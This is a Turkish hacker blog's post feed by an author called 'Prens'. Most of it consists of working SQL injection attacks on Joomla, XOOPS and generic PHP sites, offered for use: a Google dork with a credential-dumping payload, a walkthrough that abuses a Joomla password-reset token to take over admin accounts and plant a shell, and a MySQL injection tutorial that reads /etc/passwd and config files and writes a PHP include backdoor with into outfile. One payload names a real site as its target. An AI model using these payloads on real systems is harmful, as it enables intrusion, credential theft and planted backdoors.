S.a Beyler Bir Kaç Gündür Asım (H4ckinger) ve Arda kardeşimin projeleri olan facebooktan daha eğlenceli ve zevkli olan
http://www.iletio.com Adresine takılıyorum gayette güzel başarılı bir site çok güzel arkadaşlıkalr sohbetler dönüyor
Hepinizi Beklerim.
Bakış sayısı: 73
Etiketler:
Author = Prens
Web Page = www.megaturks.net
Dork = inurl:com_galleries
Exploit =www.site.com/index.php?option=com_galleries&task=showGallery&id=137+and+1=0+union+select+0,1,2,group_concat( username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users--
Demo Site = Tıkla
No Exploit-db Yes Megaturks
Bakış sayısı: 150
Etiketler:
Bugun bi yerde bi yazı okudum inanın birazda zoruma gitti ne derseniz az bi açıklayım bir coder sitesi benim de sevdiğim arkdaşlar vardı girim dedim okuyorum nasıl hacker olunur diye bi başlık okudum alttaki yorumlara bakınca hepsinin dediği kod bilmeden hacker mi olunur işte milw0rm gibi sitelerde gezenler lamerler felan şimdi burda zoruma giden şu oldu ben kod bilmiyorum ama o kod bilenleri alt edebiliyorum madem okadar fazla kod biliyorsunuz neden o açıkları bırakıyorsunuz madem siz codersiniz sizler işi bilen üstad kişilersiniz peki neden ozaman açık oluyo o script lerde union+select+all sorgusunu bilmiyormusunuz siz coder değilmisiniz yada rfi neden bırakılıyor yoksa siz sahtemisiniz hadi ben SQL yi RFİ yi ezbere gidiyorum kod bilmiyorum siz biliyorsunuz ama yinede açık kalıyo yoksa sizdemi ezbere gidiyorsunuz LFİ bırakıyorsunuz siz coder olarak ../../../etc/passwd bu işlemin gerçekleşeceğini bilmiyormusunuz hımm demekki sizler coder değil çakma kolpa 4 işe yaramazdan başka bişe değilsiniz o beğenmediğiniz milw0rm,security-focus larda 0day exploitler yada sql buglar yayınlanmasa acaba o coderler kendilerini nasıl geliştirecekeler yada o açıkları fixleyip security expert lik yapacaklar ama onlar coder onlar yapar herkesi nasıl olurda aynı kefeye koyuyorsunuz anlamıyorum her kod bilmeyen lamer oluyor :) ne ilginç demi bende üstte tüm koderleri aynı keyefe koydum ne güzel demi ama öyle değil işini hakkı ile yapanlarda var diye biliyorum ama siz ler çok bilmişler her milw0rm da gezeni hevesi olup ta 2 dork aratanı google ile açık arayanı lamer olarak görüyorsunuz ya yazıklar olsun diyorum. O çok değer verdiğim insanlar belki alınacaklar ama yapacak bişe yok.
Size Tek Diyeceğim Ben Kod Bilmiyor Olabilirim Ama İnanın O Kod Bilenlerden Daha Çok İşe Yarar İcraat Yapıyorum Ve Buna Lamerlik Diyorsanız Ben Lamerim Tamam Mı Rahatladınız mı Soğdunuz mu Mutlumusunuz.
Kimi Neye Göre Değerlendireceğinize Siz Karar veremezsiniz ve son olarak diyorum ki Demekki Bazı İnsanlarla Samimiyetimi gözden geçirmem gerekecek msn de kanka şu sitede açık varmı derken siz coder olupta yazılarda kod bilmeyenlere lamer derseniz benle alakanız olmasın Sayın coder beyler Hadi Herkes Kendi Yoluna Ben bir Lamer Olarak Diyorum Bunu Siz Bir coder Olarak Nasıl Anlarsanız.
Bakış sayısı: 202
Etiketler:
S.a beyler Bugun Sizlere Farklı bi konu anlatacam aslında güzel bişe anlatmasam mı diye çok düşündüm ama anlatım dedim nede olsa ülkemiz heykır çıakrma konusunda 1 numara başlayalım konumuz joomla
Şimdi joomla sitelerde sql bulunur ama genelde herkes md5 i kırmaya çalışır öyle admin panele girmek ister biz md5 kırmayacaz aslında oldukça eski bir yöntem kullandığım fakat daha bilmeyen okadar insan varki anlatalım
Site.com/index.php?option=com_prens&catid=2+and+1=0+union+select+0,1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
Şeklindeki bir sql sorgusunda bize username ve password verir bizde md5 kırmaya çalışırız aslında hiç gerek yok
şimdi biz şunu yapacaz
Site.com/index.php?option=com_prens&catid=2+and+1=0+union+select+0,1,2,group_concat(username,0x3a,email),4,5+from+jos_users--
SQL sorgusunda biz password yerine email yazıyoruz karşımıza şöle bişe geldi vazsayalım
Prens : prens@megaturks.net
şimdi username , email geldi napacaz sitemize şu komutu girelim
site.com/index.php?option=com_user&view=reset
şeklinde girdiğimizde karşımıza parola sıfırlama ekranı çıktı üstteki email i yazıyoruz ve karşımıza token gelir
şimdi oraya napacaz üstteki sql sorgumuzda bi komut yazarak token i alalım
Site.com/index.php?option=com_prens&catid=2+and+1=0+union+select+0,1,2,group_concat(username,0x3a,activation),4,5+from+jos_users--
activation = yazarak activation kodunu alıyoruz ve token yazan yere yapıştırıp ileri diyoruz ve sürpüzzz karşımıza parola sıfırlama ekranı geldi istediğimiz bir parolayı yaparız kendimize göre username zaten biliyoruz
Site.com/administrator yapıyoruz user pass giriyoruz hoop paneldeyiz
temlpateden shell soka bilirsiniz.
Saygılar Prens... Çalıntı yapan alıntı yazsın :)
Bakış sayısı: 208
Etiketler:
Yorum = Gülmekten Öldüm ya İlk Okudğumda Bu nası bişedir Haberin içinde Koptuğum 2 Nokta var Birinde
Kadın Ağlamış diyo,diğeri ise Kurbağa cinnet Geçirip Balığı Öldürmüş :D kop abi ya
Bakış sayısı: 184
Etiketler:
S.a arkadaşlar Son Yılların En Fazla Kullanılan Saldırı türlerinden biri Olan SQL injection da Mysql İnj. anlatıcam Genel Olarak Anlatacaklarım.
1 = Table , Column bulmak
2 = load_file kullanımı
3 = into+outfile
Kullanımlarını Anlatacam Videolu Anlatmak İsterdim ama Hem Makale Hemde Yazarak ve Uygulayarak Öğrenmenizi İstedim Başlayalım.
Şimdi Öncelikle söze hedef siteniz diye girmiyorum Googlede arama yaptınız ve mysql injection yiyen bi site buldunuz hemen başlayalım ozaman
Genelde Saldırı 'a şeklinde yapılır genelde vede sayfa size hata verir
peki bu şekilde hata vermezse nolcak site sonuna illa 'a değil farklı bir kaç bişeler ekleyin benim size önerim +and+1=0 şimdi hepsinin kullanımına bakalım
site.com/mega.php?mega_id=1+and+1=1 dediğimizde sayfamız aynı gelecektir
site.com/mega.php?mega_id=1+and+1=0 dersek sayfamızda hata olduğunu görürüz buda bize mysql inj yapma hakkını verir.
2. adım olarak column bulma bunu 2 şekilde yaparız ya order+by+column sayısı olarak yada sıra sıra yan yana yazarak ikisinden biri kesin tutar order ile devam edelim
site.com/mega.php?mega_id=1+order+by+30-- yapalım eğer ki sayfamızdaki column 30 dan az ise size unknow '30' şeklinde bi hata verir ozaman düşürelim biraz
site.com/mega.php?mega_id=1+order+by+15-- hala mı aynı düşürelim
site.com/mega.php?mega_id=1+order+by+10-- yaptık ve sayfa ilk halini aldı yani hata almadığımız ozaman column sayımız 10 ile 15 arası
site.com/mega.php?mega_id=1+order+by+12 yaptık sayfa bozulmadı 13 yaptık sayfa bozuldu
ozaman column saymız 12 ye kadar olduğu anlaşılır vede sitemize uygulayalım
site.com/mega.php?mega_id=1+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
dikkat ederseniz ben sonunu -- şeklinde bitirdim çoğu kişi /* kullanır ikiside olur ama /* yapıldığında / filtrelebilir o yüzden -- ile bitirmenizi öneririm şimdi columnlarımızı bulduk ekrana 1 column u vurdu diyelim genel olarak ilk iş hemen table aranız ama biz bi kaç şeye bakalım
site.com/mega.php?mega_id=1+and+1=0+union+select+version(),2,3,4,5,6,7,8,9,1 0,11,12--
yazarak versionu öğreniriz ki ona göre inj yapacaz mysql 4 lerde yapamazsınız ama mysql 5 lerde yapa bilirsiniz bizimkini 5 sayalım ve devam edelim
Tableleri bulalım
site.com/mega.php?mega_id=1+and+1=0+union+select+group_concat(table_name),2 ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles--
dediğimizde karşımıza tableler çıakr yalnız bi fark la karşımıza sistem tabloları da çıkar buda
ekrana sığmadığından asıl tabloları göremeyiz onun için şu komutu direlim
site.com/mega.php?mega_id=1+and+1=0+union+select+group_concat(table_name),2 ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles+where+table_schema=database()–
komutunu girdiğimiz de sistem tabloları değil sadece db de tutulan işimize lazım tableleri alırız
peki bize hangileri yarar buna sizin bakış açınız lazım ama genelde arananlar
admin,yonetici,order,ftp,siteayar,mailserver gibi tableler aranız biz admini alalım genelde herkesin istediği şimdi admin tablosundan columnları çekelim
site.com/mega.php?mega_id=1+and+1=0+union+select+group_concat(column_name), 2,3,4,5,6,7,8,9,10,11,12+from+information_schema.c olumns+where+table_name='admin'-- şeklinde girersek karşımıza admin tablosundaki columnlar gelmesi lazım ama bazen filtreleye biliyorlar onun için de hex leyelim kodumuzu
site.com/mega.php?mega_id=1+and+1=0+union+select+group_concat(column_name), 2,3,4,5,6,7,8,9,10,11,12+from+information_schema.c olumns+where+table_name=0x61646d696e admin adını hexleyip dediğimizde bize columnları verecektir
kisi sistemlerde group_concata izin vermez onun içinde limit kullanırız bunu hem table hemde coloum kullanımı için yapa biliriz table bulalım
site.com/mega.php?mega_id=1+and+1=0+union+select+table_name,2,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+where+lim it 0,1
şeklinde yaparsak karşımıza sistem dosyaları dahi gelse limit i her arttırdığımızda farkl bir table vereceği için uzun ama garanti bir yol olur şu şekil
site.com/mega.php?mega_id=1+and+1=0+union+select+table_name,2,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+where+lim it 1,1
site.com/mega.php?mega_id=1+and+1=0+union+select
+table_name,2,3,4,5,6,7,8,9,10,11,12+from+informat ion_schema.tables+where+limit 2,1
site.com/mega.php?mega_id=1+and+1=0+union+select+table_name,2,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+where+lim it 3,1
her seferinde limitleri arttırarak farklı tablelere ulaşa biliriz.
şimdi tablemiz admin column larımızda email,kullaniciadi,sifre olsun bunları siteye nasıl uygulayacaz bakalım
site.com/mega.php?mega_id=1+and+1=0+union+select+group_concat(email,0x3a,ku llaniciadi,0x3a,sifre),2,3,4,5,6,7,8,9,10,11,12+fr om+admin-- dediğimizde bize sitede kaç tane admin yetkisine sahip kişi var ekrana vuracaktır.
Dikkatinizi çekmiş ola bilir neden email,kullaniciadi,sifre arasına 0x3a koydun derseniz hemen söyleyim 0x3a : iki noktanın hexlenmiş şeklidir ekrana vururken email:kullaniciadi:sifre olarak vurur
evet admin bilgilerimizi böyle çektik.
Load_file kullanımı
load_file ile serverdeki yetkilileri göre bilir dosyaları okuya biliriz.
şöyle gösterim
site.com/mega.php?mega_id=1+and+1=0+union+select+load_file('/etc/passwd),2,3,4,5,6,7,8,9,10,11,12--
komutu ile serverdeki yetkili isimleri ile yetki sınırlarını görebiliriz
Yine load_file ile yetkili değil bazen de dosya okuruz oda şu şekil
site.com/mega.php?mega_id=1+and+1=0+union+select+load_file('/home/mega/public_html/config.php'),2,3,4,5,6,7,8,9,10,11,12--
Host =localhost
Name =megadb
Sifre =mega123
Db =mega_db
eğer bir sorun çıakrsa yine kodları hexleyin şu şekil
site.com/mega.php?mega_id=1+and+1=0+union+select+load_file(0x2f686f6d652f6d 6567612f7075626c69635f68746d6c2f636f6e6669672e7068 70),2,3,4,5,6,7,8,9,10,11,12--
şeklinde config okuya bilirsiniz. şimdi bunları yaptıktan sonra 2 türlü deneme yapa bilirsiniz
1= şifreleri ftp,cpnel,plesk, sifresi olarak denemek
2= şifreleri ssh ile bağlantı olarak demek.
Into+outfile Kullanımı
Bu komutla sitede dosya oluştura bilirsiniz genelde rfi oluştururlur bizde öyle yapalım
site.com/mega.php?mega_id=1+and+1=0+union+select+' <?include($_GET["mega"]);?>',2,3,4,5,6,7,8,9,10,11,12+from+information_sc hema.tables +into+outfile+'/home/mega/public_html/mega.php–
Bu yaptığımız işlem ile sitede mega.php adında içinde <?include($_GET["mega"]);?> şeklinde bir php kodu bulunan bir dosya oluşturduk.
Not = Arada Boşluklar Var Siz kullanırken onları kaldırın :)
Saygılar Megaturks.net -- Prens
Bakış sayısı: 328
Etiketler:
Selam Arkadaşlar Bayadır blog a yazmıorum bunun bir kaç sebebi avr en büyük sebebi ise real işlerim
şehir dışında seminerlere toplantılara katılmam en büyük sorun diğer sebebler ise paylaştıklarımın izin alınmadan kullanılması bu gibi neden dolayı yazmıyordum ama baya bi kişi dedi güzel yazılar yazıyorsun devam et Bundan sonra blog a tam gaz devam ediyorum hadi hayırlısı.
Bakış sayısı: 175
Etiketler:
-------------------------------------------------
+Vulnerability : http://www.site.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=1
+Exploitable : http://www.seslisohbet.gen.tr/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=1+and+1=0+union+select+1,concat(uname,0x3a,pass)+from+e_xoops_users--
Bakış sayısı: 297
Etiketler:
Bakış sayısı: 330
Etiketler:
S.a arkadaşlar bugun erbay la anlaşmamız sonucu cyberhaber editörü oldum bundan sonra yazı ve makalelerimi cyberhaberde yayınlayacağım.
Bakış sayısı: 352
Etiketler:
lebisoft injection,exploit,python,perl,hack,ruby,pr3ns,hack,hacking,komedi,eğlence sql,sql şiir,kaşar,ipne aşk,sevgi,özlem,siir
Şu an blogda: 1
Önceki ayın hiti: 5763
Dünkü hit: 124
Bugünkü hit: 13
Toplam hit: 57677
